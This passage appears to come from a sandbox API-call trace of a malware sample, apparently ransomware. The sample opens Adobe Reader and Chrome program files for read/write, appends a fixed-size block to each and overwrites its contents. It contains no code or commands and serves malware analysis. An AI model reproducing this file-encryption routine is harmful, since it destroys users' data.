(normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\2052.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.272] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst", lpFilePart=0x2d5f690*="2052.mst") returned 0x64 [0127.272] GetLastError () returned 0x5 [0127.273] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0127.273] LocalFree (hMem=0x69e2b0) returned 0x0 [0127.273] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0127.273] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0127.273] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0127.273] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0127.274] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\2052.mst")) returned 0x21 [0127.274] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0127.276] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0127.276] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4214 [0127.276] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0127.276] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.276] ReleaseMutex (hMutex=0x168) returned 1 [0127.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Viktigt.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0127.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Viktigt.htm", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Viktigt.htm", lpUsedDefaultChar=0x0) returned 11 [0127.276] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.292] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3214 [0127.292] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.296] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3214 [0127.296] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.296] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0127.296] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0127.296] CloseHandle (hObject=0x1dc) returned 1 [0127.297] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\docs.crx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0127.298] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0127.298] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x11e2 [0127.299] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0127.299] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.299] ReleaseMutex (hMutex=0x168) returned 1 [0127.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="docs.crx", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0127.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="docs.crx", cchWideChar=8, lpMultiByteStr=0x1f735ac, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="docs.crx", lpUsedDefaultChar=0x0) returned 8 [0127.299] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x11e2, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2d5f2bc*=0x11e2, lpOverlapped=0x0) returned 1 [0127.306] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0127.307] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x176a, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2d5f2d0*=0x176a, lpOverlapped=0x0) returned 1 [0127.307] CloseHandle (hObject=0x1dc) returned 1 [0127.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\setup.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0127.309] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0127.309] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1a3f58 [0127.309] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0127.309] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.310] ReleaseMutex (hMutex=0x168) returned 1 [0127.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="setup.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0127.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="setup.exe", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setup.exe", lpUsedDefaultChar=0x0) returned 9 [0127.310] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0127.314] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.316] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a2f58 [0127.316] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.321] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a2f58 [0127.321] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.323] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0127.323] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0127.323] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0127.323] CloseHandle (hObject=0x1dc) returned 1 [0127.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\de.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0128.178] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.178] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x463fc [0128.178] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.198] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.204] ReleaseMutex (hMutex=0x168) returned 1 [0128.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="de.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="de.pak", cchWideChar=6, lpMultiByteStr=0x1f7acb4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="de.pak", lpUsedDefaultChar=0x0) returned 6 [0128.204] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0128.206] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x453fc [0128.206] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.208] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x453fc [0128.208] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.208] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0128.208] WriteFile (in: hFile=0x1dc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0128.208] CloseHandle (hObject=0x1dc) returned 1 [0128.209] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fi.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0128.210] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.210] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4b6ae [0128.210] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.210] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.210] ReleaseMutex (hMutex=0x168) returned 1 [0128.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fi.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fi.pak", cchWideChar=6, lpMultiByteStr=0x1f7acb4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fi.pak", lpUsedDefaultChar=0x0) returned 6 [0128.210] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0128.212] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4a6ae [0128.212] ReadFile (in: hFile=0x1dc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.213] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4a6ae [0128.214] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.214] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0128.214] WriteFile (in: hFile=0x1dc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0128.218] CloseHandle (hObject=0x1dc) returned 1 [0128.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\id.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0128.230] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.230] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x47e7d [0128.231] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.231] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.231] ReleaseMutex (hMutex=0x168) returned 1 [0128.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="id.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="id.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="id.pak", lpUsedDefaultChar=0x0) returned 6 [0128.231] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0128.233] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x46e7d [0128.233] ReadFile (in: hFile=0x1dc, lpBuffer=0x2866f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.235] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x46e7d [0128.235] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.236] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0128.236] WriteFile (in: hFile=0x1dc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0128.236] CloseHandle (hObject=0x1dc) returned 1 [0128.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\mr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0128.238] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.238] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa1beb [0128.238] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0128.238] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.238] ReleaseMutex (hMutex=0x168) returned 1 [0128.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mr.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mr.pak", cchWideChar=6, lpMultiByteStr=0x1f7accc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mr.pak", lpUsedDefaultChar=0x0) returned 6 [0128.239] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.242] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xa0beb [0128.242] ReadFile (in: hFile=0x1dc, lpBuffer=0x2866f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.244] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xa0beb [0128.245] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.246] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0128.246] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.246] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.247] CloseHandle (hObject=0x1dc) returned 1 [0128.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ru.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0128.250] SetFilePointer 